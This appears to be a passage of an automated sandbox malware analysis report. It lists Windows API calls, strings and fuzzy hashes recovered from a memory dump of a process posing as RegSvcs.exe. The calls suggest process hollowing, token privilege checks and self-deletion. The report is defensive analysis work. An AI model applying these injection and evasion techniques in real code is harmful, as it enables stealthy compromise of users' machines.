memset.NTDLL ref: 05C744AF
GetCurrentProcess.KERNEL32 ref: 05C744C0

Part of subcall function 05C751A4: NtQueryInformationProcess.NTDLL(05C744CC,00000018,00000000,00000004,05C744CC), ref: 05C751EF

LoadLibraryW.KERNEL32(00000000), ref: 05C74558
GetModuleFileNameW.KERNEL32(00000000,05C7E344,00000104), ref: 05C7456A
rand.MSVCRT ref: 05C745D8
free.MSVCRT ref: 05C7463E
memset.NTDLL ref: 05C74658
free.MSVCRT ref: 05C7481D
free.MSVCRT ref: 05C74835
VirtualProtect.KERNEL32(?,00001000,00000040,?), ref: 05C74880
VirtualProtect.KERNEL32(?,00001000,?,?), ref: 05C7489F
GetCurrentProcess.KERNEL32(?,00001000), ref: 05C748A5
FlushInstructionCache.KERNEL32(00000000), ref: 05C748AC
time.MSVCRT(00000000), ref: 05C748BD
srand.MSVCRT ref: 05C748C4
CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 05C748D0
rand.MSVCRT ref: 05C7493F
strtok.MSVCRT(?,05C7D424), ref: 05C7495B
_mbsdup.MSVCRT ref: 05C74972
free.MSVCRT ref: 05C74981
_mbsdup.MSVCRT ref: 05C74998
CreateTimerQueue.KERNEL32 ref: 05C749B4
GetCurrentProcess.KERNEL32(00020008,?), ref: 05C749CE
OpenProcessToken.ADVAPI32(00000000), ref: 05C749D5
AllocateAndInitializeSid.ADVAPI32(00000000,00000001,00000012,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 05C74A19
EqualSid.ADVAPI32(00000000,?), ref: 05C74A28
RtlConvertSidToUnicodeString.NTDLL(?,00000000,00000001), ref: 05C74A39
FreeSid.ADVAPI32(?), ref: 05C74A42
free.MSVCRT ref: 05C74A49
CloseHandle.KERNEL32(?), ref: 05C74A53
GetCurrentProcessId.KERNEL32 ref: 05C74A6C
rand.MSVCRT ref: 05C74734

Part of subcall function 05C776B5: QueryPerformanceCounter.KERNEL32(?,?,?,00000000,?,?,?,05C75F18,?,?,?,?,?,?,05C74E15,00000000), ref: 05C776D3

rand.MSVCRT ref: 05C74AE7
memset.NTDLL ref: 05C74B0B
CreateTimerQueueTimer.KERNEL32(00000028,?,05C75779,00000000,0000012C,00000000,00000010,?,?,?,00000000,?,?), ref: 05C74C69
free.MSVCRT ref: 05C74C73
WaitForSingleObject.KERNEL32(?,000000FF), ref: 05C74C85
DeleteTimerQueueEx.KERNEL32(?,000000FF), ref: 05C74C90
CloseHandle.KERNEL32(?), ref: 05C74C9B
calloc.MSVCRT ref: 05C74CF5
strlen.NTDLL ref: 05C74DC6
free.MSVCRT ref: 05C74DFB
free.MSVCRT ref: 05C74E19
free.MSVCRT ref: 05C74E23

Strings

,, xrefs: 05C74AAD
,, xrefs: 05C746F4

Memory Dump Source

Source File: 00000005.00000002.2405092435.0000000005C73000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C73000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5c73000_RegSvcs.jbxd

Yara matches

Similarity

API ID: free$Process$CurrentTimerrand$CreateQueuememset$CloseHandleProtectQueryVirtual_mbsdupcallocmalloc$AllocateCacheConvertCounterDeleteEqualEventFileFlushFreeInformationInitializeInstructionLibraryLoadModuleNameObjectOpenPerformanceSingleStringTokenUnicodeWaitsrandstrlenstrtoktime
String ID: ,$,
API String ID: 4253899496-220654547
Opcode ID: 6128feade065a1bc65707704e8ef755cf2358b31a63301178c528d3fb5e0c3f6
Instruction ID: 460f9b3a8fd5aecba728289f281488aac1f47570e3b9e6007f8819c0b0b62c14
Opcode Fuzzy Hash: 6128feade065a1bc65707704e8ef755cf2358b31a63301178c528d3fb5e0c3f6
Instruction Fuzzy Hash: 5E629FB1A0020EAFDF14DFA4DC89AAEBBB9FF08314F144919F91597A41DB70D950DBA0

Function 05C773ED Relevance: 15.1, APIs: 10, Instructions: 83nativesleepmemoryCOMMON

Download Yara Rule

APIs

IsBadReadPtr.KERNEL32(05C76D60,00000040), ref: 05C773FA

Part of subcall function 05C774D3: GetModuleFileNameW.KERNEL32(05C77419,?,00000104,05C76D60,?), ref: 05C7750F
Part of subcall function 05C774D3: RtlInitUnicodeString.NTDLL(?,?), ref: 05C77526
Part of subcall function 05C774D3: NtOpenFile.NTDLL(000000FF,00010000,?,?,00000005,00000000), ref: 05C7755F

malloc.MSVCRT ref: 05C7743D
GetCurrentProcess.KERNEL32(05C76D60), ref: 05C77456
NtUnmapViewOfSection.NTDLL(00000000), ref: 05C7745D
VirtualAlloc.KERNEL32(05C76D60,?,00003000,00000040), ref: 05C77474
GetLastError.KERNEL32 ref: 05C7747C
NtSetInformationFile.NTDLL(?,?,00000001,00000001,0000000D), ref: 05C774A2
Sleep.KERNEL32(000000C8), ref: 05C774B1
free.MSVCRT ref: 05C774BE
NtClose.NTDLL(?), ref: 05C774C8

Memory Dump Source

Source File: 00000005.00000002.2405092435.0000000005C73000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C73000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5c73000_RegSvcs.jbxd

Yara matches

Similarity

API ID: File$AllocCloseCurrentErrorInformationInitLastModuleNameOpenProcessReadSectionSleepStringUnicodeUnmapViewVirtualfreemalloc
String ID:
API String ID: 2127940379-0
Opcode ID: af48ea345e81ddbbb6752ec1229b203343385df84a7571ef34ab5b9e82ce9c1a
Instruction ID: f4b6ed897248f139921b1e756822b5af241de279c5cdc15e8aff420e88b390e4
Opcode Fuzzy Hash: af48ea345e81ddbbb6752ec1229b203343385df84a7571ef34ab5b9e82ce9c1a
Instruction Fuzzy Hash: 3A21713260020DBBDB106AF5AC4EFAA7FACFB41750F144425F605A2990EB749A00DEE0

Function 05C770D6 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

VirtualQuery.KERNEL32(Function_0000591D,?,0000001C,00000000,?), ref: 05C770EF
memset.NTDLL ref: 05C770F9
GetSystemInfo.KERNEL32(?), ref: 05C77105
memset.NTDLL ref: 05C7711B
VirtualQuery.KERNEL32(?,?,0000001C), ref: 05C7712A

Strings

@, xrefs: 05C77147

Memory Dump Source

Source File: 00000005.00000002.2405092435.0000000005C73000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C73000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5c73000_RegSvcs.jbxd

Yara matches

Similarity

API ID: QueryVirtualmemset$InfoSystem
String ID: @
API String ID: 588600184-2766056989
Opcode ID: 41ef20c83f9211db6f33db79eef3f85c4f0429e42d970e2c612a359a160bdf21
Instruction ID: 2f9a67ddd64a35efeb6660172096438f4249cd23654cce5a77f3a457a66317f5
Opcode Fuzzy Hash: 41ef20c83f9211db6f33db79eef3f85c4f0429e42d970e2c612a359a160bdf21
Instruction Fuzzy Hash: 51211D71A0020DEBDF20DAA4DC49FEEBBB9FB44340F004915F916A7550D7B4AA45CF91

Function 05C774D3 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 57filenativeCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(05C77419,?,00000104,05C76D60,?), ref: 05C7750F
RtlInitUnicodeString.NTDLL(?,?), ref: 05C77526
NtOpenFile.NTDLL(000000FF,00010000,?,?,00000005,00000000), ref: 05C7755F

Strings

@, xrefs: 05C77555

Memory Dump Source

Source File: 00000005.00000002.2405092435.0000000005C73000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C73000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5c73000_RegSvcs.jbxd

Yara matches

Similarity

API ID: File$InitModuleNameOpenStringUnicode
String ID: @
API String ID: 3678443772-2766056989
Opcode ID: 466646b0d2029389ba10f4e93242927c8235602bdd7bfadc8d22996079763e31
Instruction ID: 3bce1a426a1c994f157b4632ce6f583369593e9e7b5e3260f0493457880c1050
Opcode Fuzzy Hash: 466646b0d2029389ba10f4e93242927c8235602bdd7bfadc8d22996079763e31
Instruction Fuzzy Hash: 4F114C71D0120EABDB10CFA4D849BDEBBF8BB08314F1045A6A615F6180EBB5AB05CF90

Function 05C788F1 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 18nativeCOMMON

Download Yara Rule

APIs

NtQueryInformationProcess.NTDLL(?,?,?,?,?), ref: 05C78905

Strings

", xrefs: 05C7890F

Memory Dump Source

Source File: 00000005.00000002.2405092435.0000000005C73000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C73000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5c73000_RegSvcs.jbxd

Yara matches

Similarity

API ID: InformationProcessQuery
String ID: "
API String ID: 1778838933-123907689
Opcode ID: cea5a112996193efe2b29a7a9be46e70a72d3069d6f4535cadd3222127e76545
Instruction ID: 282050ab1b3f90289c424d97165ad2c35a391e13f177c1aa09fed577ce7f70b5
Opcode Fuzzy Hash: cea5a112996193efe2b29a7a9be46e70a72d3069d6f4535cadd3222127e76545
Instruction Fuzzy Hash: 9AE0123340121DBBCF215F91DC05DDA7F69FF092A0B008455FA0455520C33196A0EFE2

Function 01965D90 Relevance: 2.7, Strings: 2, Instructions: 196COMMON

Download Yara Rule

Strings

4'^q, xrefs: 01965E63
4'^q, xrefs: 01965E8E

Memory Dump Source

Source File: 00000005.00000002.2386349298.0000000001960000.00000040.00000800.00020000.00000000.sdmp, Offset: 01960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_RegSvcs.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q
API String ID: 0-2697143702
Opcode ID: 837ad96bb4bbb038afe895a90e767a59c2945a387e4e1548878f092c2f6af767
Instruction ID: d42e1175ccfbfd47c9d22702a3c51acbe3565d0aa3494cf08fe3b1921a57f5a8
Opcode Fuzzy Hash: 837ad96bb4bbb038afe895a90e767a59c2945a387e4e1548878f092c2f6af767
Instruction Fuzzy Hash: 14818B70A042468FD709DF2AE8A4699BFF7FFD9300F04D56AC0099B269EB385805CF51

Function 01965DC0 Relevance: 2.6, Strings: 2, Instructions: 150COMMON

Download Yara Rule

Strings

4'^q, xrefs: 01965E63
4'^q, xrefs: 01965E8E

Memory Dump Source

Source File: 00000005.00000002.2386349298.0000000001960000.00000040.00000800.00020000.00000000.sdmp, Offset: 01960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_RegSvcs.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q
API String ID: 0-2697143702
Opcode ID: eb1c5a7c8fbd9945dce43003cbfc7db83599c122e6e3c3701361dd48c797cb2c
Instruction ID: 8b8c8b869cc5b92bccb72daf9b55716248d80664ddda0d834193131cdf28c64d
Opcode Fuzzy Hash: eb1c5a7c8fbd9945dce43003cbfc7db83599c122e6e3c3701361dd48c797cb2c
Instruction Fuzzy Hash: 51512BB0A00206CFD708DF6AE8A46AABBF7FBD8300F14D52DD5099B268EF7458458F55

Function 05CA3FD2 Relevance: .3, Instructions: 341COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2405092435.0000000005CA3000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CA3000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5ca3000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e44a708600aeeaa220d5003fe088f9e7b998e50fe90245b10d470989910b19ad
Instruction ID: eb02eb287917c8c53c2937c690720b405b2099a8e64dbafbe4df56334e333805
Opcode Fuzzy Hash: e44a708600aeeaa220d5003fe088f9e7b998e50fe90245b10d470989910b19ad
Instruction Fuzzy Hash: 1EB1BA6240E3C19FDB578B349CB95A17FB0AE17218B1E4ACFC4C08F4A3E359591AD722

Function 05C73000 Relevance: .3, Instructions: 294COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2405092435.0000000005C73000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C73000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5c73000_RegSvcs.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 60832381d4f21658578096ee1f0e40a74a2514dbef980b027c1ecf22ae11ab6b
Instruction ID: 1f29b8aed15e8c3dee55f6b738a29e1f2ff96599a889b8570b43e1faf564e6bb
Opcode Fuzzy Hash: 60832381d4f21658578096ee1f0e40a74a2514dbef980b027c1ecf22ae11ab6b
Instruction Fuzzy Hash: 2DB15C31A0026DAFCF15CE28C4D49BC7BB1FB44755F208E6AEC66DB681D630DA81DB84

Function 05C78E79 Relevance: .2, Instructions: 247COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2405092435.0000000005C73000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C73000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5c73000_RegSvcs.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8482a4b5df4de674a632f7c80395102a977ec2d3cfca28e88d00b64f01294b48
Instruction ID: a9812becac7911cc43ee87998cb8c2592154adf1afaf1f28bd5335e7e6985b62
Opcode Fuzzy Hash: 8482a4b5df4de674a632f7c80395102a977ec2d3cfca28e88d00b64f01294b48
Instruction Fuzzy Hash: C5A11671F006099FCB48CF99C88159EBBF2FF8C350B64852DE91AE7345D634AA45CB90

Function 0196A038 Relevance: .2, Instructions: 235COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2386349298.0000000001960000.00000040.00000800.00020000.00000000.sdmp, Offset: 01960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 95a6be16f07bef6a1e485d67339fb1d5e1a1e67a35beff15eeaef449fa5e3474
Instruction ID: 16b85564660fd3ffb1238f7945eee15dafb66f7a41aea15539ed470d42c7bc38
Opcode Fuzzy Hash: 95a6be16f07bef6a1e485d67339fb1d5e1a1e67a35beff15eeaef449fa5e3474
Instruction Fuzzy Hash: 36918F71E0062A9FDB15CFA8C9806ADFBF6FB88305F148129D459F7245D774EA42CBA0

Function 05C7AC20 Relevance: .1, Instructions: 119COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2405092435.0000000005C73000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C73000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5c73000_RegSvcs.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3a11904e258de2d130d0a30781c403d509553e77fd5b17ba338bd5f78d6e0da2
Instruction ID: e3b0a8d7173262540d41cdda5031bf5f45bab347fea0239ca900305f25fd5f06
Opcode Fuzzy Hash: 3a11904e258de2d130d0a30781c403d509553e77fd5b17ba338bd5f78d6e0da2
Instruction Fuzzy Hash: 69416B262497C49FC316CB7D8894C9ABFA29FB3104768CACCD0855F767C1B1E949C7A2

Function 05C78710 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2405092435.0000000005C73000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C73000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5c73000_RegSvcs.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be8763645d277115552ed53be67c357b9b87018f3cd0cd03982b6d0b6e6688e4
Instruction ID: b77e13629650bbc627c1a055238df8c792b0bdee0aac5b41aaae59f22c3dd41f
Opcode Fuzzy Hash: be8763645d277115552ed53be67c357b9b87018f3cd0cd03982b6d0b6e6688e4
Instruction Fuzzy Hash: 77115275604109EFCF14CF59C885AA9B7B5FF04355B5489A9F90BE7A40E734FA40CBA0

Function 05C7B22E Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2405092435.0000000005C73000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C73000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5c73000_RegSvcs.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d4f03b7391e7aaf68ed7c3e788056aed7a1ba10f648ce8214bcd502b1cb98124
Instruction ID: 38cd8b5e0535cceb90e99de05f4970d59d294baac4c16d8b036bb68a3f5879b9
Opcode Fuzzy Hash: d4f03b7391e7aaf68ed7c3e788056aed7a1ba10f648ce8214bcd502b1cb98124
Instruction Fuzzy Hash: 9DF06872A05608EFCB20DF9EC98595AF3F8FF046587154979E946E3A11E370FE00D6A0

Function 05C78AA1 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2405092435.0000000005C73000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C73000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5c73000_RegSvcs.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f594ae8f203f47c0e262e84f4d0944c75cdc73dc854379cf440375569def28a
Instruction ID: d1e1e2c859ae77f86ebf571d60da6a695219b0d646258979571adc1e96373b50
Opcode Fuzzy Hash: 2f594ae8f203f47c0e262e84f4d0944c75cdc73dc854379cf440375569def28a
Instruction Fuzzy Hash: E4F090722105049FCB18CB09D996F6AB3E9FB88324F1588AAD406E7B40D674EE00DA20

Function 05C75C2B Relevance: 24.8, APIs: 13, Strings: 1, Instructions: 275fileCOMMON

Download Yara Rule

APIs

calloc.MSVCRT ref: 05C75C58
rand.MSVCRT ref: 05C75CC3
free.MSVCRT ref: 05C75D24
CreateFileMappingW.KERNEL32(000000FF,00000000,00000004,00000000,?,00000000), ref: 05C75DC9
MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000), ref: 05C75DE0
wcslen.NTDLL ref: 05C75E36
UnmapViewOfFile.KERNEL32(00000000), ref: 05C75E81
CloseHandle.KERNEL32(?), ref: 05C75EB3
TerminateProcess.KERNEL32(?,00000000), ref: 05C75EC5
CloseHandle.KERNEL32(?), ref: 05C75ED8
CloseHandle.KERNEL32(?), ref: 05C75EDD
free.MSVCRT ref: 05C75EE0

Part of subcall function 05C776B5: QueryPerformanceCounter.KERNEL32(?,?,?,00000000,?,?,?,05C75F18,?,?,?,?,?,?,05C74E15,00000000), ref: 05C776D3

free.MSVCRT ref: 05C75F04

Strings

,, xrefs: 05C75C95

Memory Dump Source

Source File: 00000005.00000002.2405092435.0000000005C73000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C73000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5c73000_RegSvcs.jbxd

Yara matches

Similarity

API ID: CloseFileHandlefree$View$CounterCreateMappingPerformanceProcessQueryTerminateUnmapcallocrandwcslen
String ID: ,
API String ID: 1755458764-3772416878
Opcode ID: 3b3536e8cf191f462a3a50fea6e3868143ffa3f5069135a66a1106f52cdfb86f
Instruction ID: d1486796f03bf3f64532099350d7567e226178b35961219b23837b47bc581613
Opcode Fuzzy Hash: 3b3536e8cf191f462a3a50fea6e3868143ffa3f5069135a66a1106f52cdfb86f
Instruction Fuzzy Hash: 39917FB2D0021DAFDB209FA4CC89AAEBFB9FF48314F148816F91597651D734DA50DBA0

Function 05C75820 Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 246memorytimeCOMMON

Download Yara Rule

APIs

DeleteTimerQueueTimer.KERNEL32(?,00000000,00000000), ref: 05C7583A
free.MSVCRT ref: 05C75B0D

Part of subcall function 05C74148: malloc.MSVCRT ref: 05C741CA
Part of subcall function 05C74148: free.MSVCRT ref: 05C7425F

VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 05C758D6
VirtualFree.KERNEL32(00000000,00000000,00008000,-00000008,00000020), ref: 05C75A13
memset.NTDLL ref: 05C75A70
VirtualProtect.KERNEL32(00000000,?,00000000,00000000,?,?,-00000008,00000020), ref: 05C75AA1
VirtualProtect.KERNEL32(00000000,00001000,00000020,?,?,?,-00000008,00000020), ref: 05C75ACB
free.MSVCRT ref: 05C75B03
SetEvent.KERNEL32(?), ref: 05C75B1D

Strings

,, xrefs: 05C758AA
, xrefs: 05C75A89
,, xrefs: 05C758B4

Memory Dump Source

Source File: 00000005.00000002.2405092435.0000000005C73000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C73000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5c73000_RegSvcs.jbxd

Yara matches

Similarity

API ID: Virtual$free$ProtectTimer$AllocDeleteEventFreeQueuemallocmemset
String ID: $,$,
API String ID: 350331399-3671380657
Opcode ID: 867709572258841da0edc8215355d67d9d01c542e27ad70e574615abea5f95f1
Instruction ID: 7e897955492e7b86e3ca04812ae8b1a953cf42e02221615f9de63aa53868bd86
Opcode Fuzzy Hash: 867709572258841da0edc8215355d67d9d01c542e27ad70e574615abea5f95f1
Instruction Fuzzy Hash: A69191B5E0020DAFDB10EFA4CC49BADBBB4FF04714F148859E9099BA51D770EA50DB94

Function 05C762CD Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 94threadlibraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,00000000), ref: 05C7630E
GetCurrentThread.KERNEL32 ref: 05C76349
OpenThreadToken.ADVAPI32(00000000), ref: 05C76350
CloseHandle.KERNEL32(00000014), ref: 05C7637B
GetLastError.KERNEL32 ref: 05C7637F
GetCurrentProcess.KERNEL32(00020028,00000014), ref: 05C76390
OpenProcessToken.ADVAPI32(00000000), ref: 05C76397
CloseHandle.KERNEL32(00000014), ref: 05C763BC
GetLastError.KERNEL32 ref: 05C763C0

Strings

z, xrefs: 05C762DD

Memory Dump Source

Source File: 00000005.00000002.2405092435.0000000005C73000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C73000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5c73000_RegSvcs.jbxd

Yara matches

Similarity

API ID: CloseCurrentErrorHandleLastOpenProcessThreadToken$AddressProc
String ID: z
API String ID: 382430730-1657960367
Opcode ID: 01052656d8e5e60a5a4874efe7fb9784b882b7c2e4250a2b8fa30e1a2de265da
Instruction ID: 201331b6a06a8c800bb628c9368f298fc81a6f1dd1e1b3a9c51be2e1188003c6
Opcode Fuzzy Hash: 01052656d8e5e60a5a4874efe7fb9784b882b7c2e4250a2b8fa30e1a2de265da
Instruction Fuzzy Hash: 55311C75E4020DBBDB10ABE1DD4ABEEBFBCEF08754F104866F611A2540DB749A44DBA0

Function 05C75F20 Relevance: 15.2, APIs: 10, Instructions: 161processlibraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 05C743AC: memset.NTDLL ref: 05C743CC
Part of subcall function 05C743AC: RtlGetVersion.NTDLL(?), ref: 05C743E5

GetStartupInfoW.KERNEL32(?,00000000,00000000), ref: 05C75F8C
GetProcAddress.KERNEL32(?,00000000), ref: 05C75FB3
GetProcAddress.KERNEL32(?,00000000), ref: 05C75FD2
GetFileAttributesExW.KERNEL32(?,00000000,?,?,?,?), ref: 05C7602F
CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,08000004,00000000,00000000,?,05C75D97,?,?,?), ref: 05C7605B
GetLastError.KERNEL32(?,?,?), ref: 05C76064
ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,?,?), ref: 05C7608A
GetFileAttributesExW.KERNEL32(?,00000000,?,?,?,?), ref: 05C760A0
CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,08000004,00000000,00000000,?,05C75D97,?,?,?), ref: 05C760D6
GetLastError.KERNEL32(?,?,?), ref: 05C760DF

Memory Dump Source

Source File: 00000005.00000002.2405092435.0000000005C73000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C73000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5c73000_RegSvcs.jbxd

Yara matches

Similarity

API ID: AddressAttributesCreateErrorFileLastProcProcess$EnvironmentExpandInfoStartupStringsVersionmemset
String ID:
API String ID: 3112045338-0
Opcode ID: 742d3dd568153a87cf4c2e986395b87b2fa6b4d9322184a17c4026ab45ecb482
Instruction ID: 7234c43182584fc4e85c3d52d3260876cff4f8da4d947ad2495d3355eb701c33
Opcode Fuzzy Hash: 742d3dd568153a87cf4c2e986395b87b2fa6b4d9322184a17c4026ab45ecb482
Instruction Fuzzy Hash: 795129B190121DABDF21EBA5CC89AEE7FBDFF04350F104866F449D6900DA309A81DFA4

Function 05C73599 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 122libraryloaderstringCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,00000000), ref: 05C735DE
GetProcAddress.KERNEL32(00000000,00000000), ref: 05C735F0
lstrlenW.KERNEL32(?), ref: 05C7360D
calloc.MSVCRT ref: 05C73657
calloc.MSVCRT ref: 05C73687
free.MSVCRT ref: 05C736BE
free.MSVCRT ref: 05C736CB

Strings

@, xrefs: 05C73637

Memory Dump Source

Source File: 00000005.00000002.2405092435.0000000005C73000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C73000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5c73000_RegSvcs.jbxd

Yara matches

Similarity

API ID: AddressProccallocfree$lstrlen
String ID: @
API String ID: 3985833908-2766056989
Opcode ID: 2f132439328186786e75bb906ea79f53dab72b5f911b0133fdc3260a51e79195
Instruction ID: 93c5ac90b2a2a25fc20857cdef123bcdf5492d5141fd61771da3a77e2020a516
Opcode Fuzzy Hash: 2f132439328186786e75bb906ea79f53dab72b5f911b0133fdc3260a51e79195
Instruction Fuzzy Hash: D0412CB1D0024DAFDF109FA5D889AEEBBB9FF04750F10882EF515A6640DB748A40DFA4

Function 05C77573 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 97memoryfileCOMMON

Download Yara Rule

APIs

Part of subcall function 05C7718B: strlen.NTDLL ref: 05C771A1
Part of subcall function 05C7718B: memset.NTDLL ref: 05C771C6
Part of subcall function 05C7718B: memset.NTDLL ref: 05C771DC

GetProcessHeap.KERNEL32 ref: 05C775B2

Part of subcall function 05C76DEA: _snwprintf.NTDLL ref: 05C76EAC
Part of subcall function 05C76DEA: OpenMutexW.KERNEL32(00100000,00000000,?), ref: 05C76ECA
Part of subcall function 05C76DEA: CloseHandle.KERNEL32(00000000), ref: 05C770BB

RtlAllocateHeap.NTDLL(00000000,00000008,00000015), ref: 05C775F1
RtlAllocateHeap.NTDLL(00000000,00000008,?), ref: 05C7761E
DeleteFileW.KERNEL32(?), ref: 05C77683
ExitProcess.KERNEL32 ref: 05C776AC

Strings

, xrefs: 05C775B8
!RHY, xrefs: 05C77592

Memory Dump Source

Source File: 00000005.00000002.2405092435.0000000005C73000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C73000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5c73000_RegSvcs.jbxd

Yara matches

Similarity

API ID: Heap$AllocateProcessmemset$CloseDeleteExitFileHandleMutexOpen_snwprintfstrlen
String ID: $!RHY
API String ID: 2521528221-3750638473
Opcode ID: 2fbb1e357a076c972658190ddd3f0e3f310dd802858007795cdeb3c53cd076c2
Instruction ID: 54bd7adaf01fd333619fd73f748b4bde9bf16c48ecf0eb224360d88319fbe05c
Opcode Fuzzy Hash: 2fbb1e357a076c972658190ddd3f0e3f310dd802858007795cdeb3c53cd076c2
Instruction Fuzzy Hash: A4318FB194030DABEF219FB4CC85FEA7BB8FB04304F004855F5499A544EB70EA94DB90

Function 05C7839F Relevance: 12.2, APIs: 6, Strings: 2, Instructions: 151COMMON

Download Yara Rule

APIs

calloc.MSVCRT ref: 05C783BB
rand.MSVCRT ref: 05C78418
free.MSVCRT ref: 05C78470
CloseHandle.KERNEL32(05C76AE6,?,?,?,?,?,?,?,?,?,?), ref: 05C78517
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 05C7851C

Part of subcall function 05C776B5: QueryPerformanceCounter.KERNEL32(?,?,?,00000000,?,?,?,05C75F18,?,?,?,?,?,?,05C74E15,00000000), ref: 05C776D3

free.MSVCRT ref: 05C78527

Strings

,, xrefs: 05C783EB
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, xrefs: 05C783A8

Memory Dump Source

Source File: 00000005.00000002.2405092435.0000000005C73000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C73000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5c73000_RegSvcs.jbxd

Yara matches

Similarity

API ID: CloseHandlefree$CounterPerformanceQuerycallocrand
String ID: ,$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
API String ID: 4072940446-755317693
Opcode ID: 7c682dd620b0f12ca43ba37e5ada89a97e3f753dec749e8b91490c9538d16542
Instruction ID: 1a26a2d7b1bc1e37a433b45e1f39f540fad3c93da238c51d36c70d61a39d0d47
Opcode Fuzzy Hash: 7c682dd620b0f12ca43ba37e5ada89a97e3f753dec749e8b91490c9538d16542
Instruction Fuzzy Hash: F7513C72A0021DAFDF11DFA5D889ADEBBF5FF48310F154415FA15A7600EB709A50CBA1

Function 05C763D6 Relevance: 12.1, APIs: 8, Instructions: 73stringCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 05C763F1

Part of subcall function 05C756A7: OpenProcessToken.ADVAPI32(?,00000008,05C755D0,00000000,74DF2E80,00000000,?,?,05C755D0,00000000,?,?,00000000,00000000,05C7D278), ref: 05C756B9
